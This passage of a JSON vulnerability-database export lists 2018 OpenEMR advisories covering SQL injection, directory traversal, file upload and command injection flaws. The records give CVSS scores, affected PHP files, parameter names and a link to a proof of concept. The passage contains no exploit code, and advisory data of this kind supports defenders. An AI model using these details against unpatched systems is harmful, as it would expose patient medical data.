"type": "cve", "title": "CVE-2018-15149", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, 
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15149"], "modified": "2018-10-12T13:10:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15149", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15149", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:31:00", "description": "SQL injection vulnerability in interface/de_identification_forms/find_code_popup.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'search_term' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15151", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15151"], "modified": "2018-10-12T13:11:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15151", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15151", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:49", "description": "SQL injection vulnerability in interface/de_identification_forms/find_drug_popup.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the search_term parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15144", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15144"], "modified": "2018-10-10T18:12:00", "cpe": [], "id": "CVE-2018-15144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15144", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:47", "description": "Multiple SQL injection vulnerabilities in portal/add_edit_event_user.php in versions of OpenEMR before 5.0.1.4 allow a remote attacker to execute arbitrary SQL commands via the (1) eid, (2) userid, 
or (3) pid parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15145", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15145"], "modified": "2018-10-10T18:11:00", "cpe": [], "id": "CVE-2018-15145", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15145", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:46", "description": "Multiple SQL injection vulnerabilities in portal/find_appt_popup_user.php in versions of OpenEMR before 5.0.1.4 allow a remote attacker to execute arbitrary SQL commands via the (1) catid or (2) providerid parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15143", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15143"], "modified": "2018-10-10T18:18:00", "cpe": [], "id": "CVE-2018-15143", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15143", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:46", "description": "Directory traversal in portal/import_template.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker authenticated in the patient portal to execute arbitrary PHP code by writing a file with a PHP extension via the \"docid\" and \"content\" parameters and accessing it in the traversed directory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15142", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15142"], "modified": "2018-10-10T18:21:00", "cpe": [], "id": "CVE-2018-15142", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15142", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:45", "description": "Directory traversal in portal/import_template.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker authenticated in the patient portal to delete arbitrary files via the \"docid\" parameter when the mode is set to delete.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15141", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15141"], "modified": "2018-10-10T18:20:00", "cpe": [], "id": "CVE-2018-15141", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15141", "cvss": 
{"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:48", "description": "Directory traversal in portal/import_template.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker authenticated in the patient portal to read arbitrary files via the \"docid\" parameter when the mode is set to get.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15140", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15140"], "modified": "2018-10-10T18:23:00", "cpe": [], "id": "CVE-2018-15140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15140", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:50", "description": "Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.", "cvss3": {"exploitabilityScore": 2.8, 
"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15139", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2022-02-10T07:23:00", "cpe": [], "id": "CVE-2018-15139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15139", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "attackerkb": [{"lastseen": "2023-06-07T15:12:07", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/main/daemon_frame.php after modifying the \u201chylafax_server\u201d global variable in interface/super/edit_globals.php.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", 
"baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T00:00:00", "type": "attackerkb", "title": "CVE-2018-15153", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15153"], "modified": "2020-06-05T00:00:00", "id": "AKB:C4DD3F24-796A-4A1A-8E1E-DE5E4F6D3E48", "href": "https://attackerkb.com/topics/KXEnyG0EPi/cve-2018-15153", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:09:16", "description": "Directory traversal in portal/import_template.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker authenticated in the patient portal to execute arbitrary PHP code by writing a file with a PHP extension via the \u201cdocid\u201d and \u201ccontent\u201d parameters and accessing it in the traversed directory.\n\n \n**Recent assessments:** \n \n**noraj** at June 24, 2021 12:00pm UTC reported:\n\nThe file upload is totally unrestricted but an account is required.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 
"version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-13T00:00:00", "type": "attackerkb", "title": "CVE-2018-15142", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15142"], "modified": "2020-06-05T00:00:00", "id": "AKB:8B5B4AAA-0168-4A40-A5D1-C502E981E3D6", "href": "https://attackerkb.com/topics/OFhXc3HEMx/cve-2018-15142", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:08:59", "description": "Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.\n\n \n**Recent assessments:** \n \n**noraj** at July 08, 2021 7:45pm UTC reported:\n\n * Title: OpenEMR < 5.0.1.4 \u2013 (Authenticated) File upload \u2013 Remote command execution \n\n * Vulnerable version: < 5.0.1.4 (it means up to 5.0.1.3) \n\n * Patch: <https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485> \n\n * Docker PoC: <https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml> \n\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-13T00:00:00", "type": "attackerkb", "title": "CVE-2018-15139", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2020-06-05T00:00:00", "id": "AKB:488ABDDA-9BC6-4701-BDC0-E87692E75C17", "href": "https://attackerkb.com/topics/Bm7UPQNfBQ/cve-2018-15139", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "SQL Injection vulnerability in OpenEMR Anything_simple.php encounter parameter\n\nVulnerability Type: SQL Injection", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-18T00:00:00", "type": "dsquare", "title": "OpenEMR Anything_simple.php SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15149"], "modified": "2018-08-18T00:00:00", "id": "E-659", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "SQL Injection vulnerability in OpenEMR find_appt_popup_user.php catid parameter\n\nVulnerability Type: SQL Injection", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-18T00:00:00", "type": "dsquare", "title": "OpenEMR find_appt_popup_user.php SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15143"], "modified": "2018-08-18T00:00:00", "id": "E-657", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", 
"description": "File upload vulnerability in OpenEMR import_template.php docid parameter\n\nVulnerability Type: File Upload", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-18T00:00:00", "type": "dsquare", "title": "OpenEMR File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15142"], "modified": "2018-08-18T00:00:00", "id": "E-656", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in OpenEMR import_template.php docid parameter\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": 
"2018-08-18T00:00:00", "type": "dsquare", "title": "OpenEMR File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15140"], "modified": "2018-08-18T00:00:00", "id": "E-658", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:45", "description": "p0wny Shell is a PHP shell. An attacker might use this shell to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "checkpoint_advisories", "title": "p0wny Shell Remote Code Execution (CVE-2017-9830; CVE-2018-15139; CVE-2018-19423; CVE-2018-6383; CVE-2020-29607; CVE-2021-24155; CVE-2021-24347)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9830", "CVE-2018-15139", "CVE-2018-19423", "CVE-2018-6383", "CVE-2020-29607", "CVE-2021-24155", "CVE-2021-24347"], "modified": "2021-10-19T00:00:00", "id": "CPAI-2021-0765", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}